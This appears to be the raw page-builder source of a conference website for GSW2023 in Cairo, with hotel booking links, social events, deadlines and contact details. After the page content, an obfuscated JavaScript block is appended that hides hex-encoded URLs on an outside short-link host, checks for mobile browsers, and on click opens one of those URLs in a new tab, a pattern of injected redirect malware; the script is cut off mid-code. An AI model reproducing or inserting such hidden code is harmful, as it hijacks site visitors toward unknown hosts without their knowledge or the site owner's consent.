post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1686350035719{margin-top: 190px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<h5></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687564731927{margin-top: 8px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684378842229{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]</p>\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\n<h4></h4>\n<p><a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570507588{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Pharaohs Cruising Restaurant</strong></h5>\n<p><img class=\"alignnone size-medium wp-image-4791 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/828c1ce1-4aca-4e92-a1e0-3d71a816c9fc-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\n<h5 style=\"text-align: center;\">Dinner and Show on the Prime Le Lac Du Caire</h5>\n<p><img class=\"alignnone size-medium wp-image-4793 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/6c0414f1-abcc-46a4-8e17-e17eb60be7b5-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\n</li>\n</ul>\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h2 style=\"text-align: center;\"></h2>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\n<p>[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"180px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else 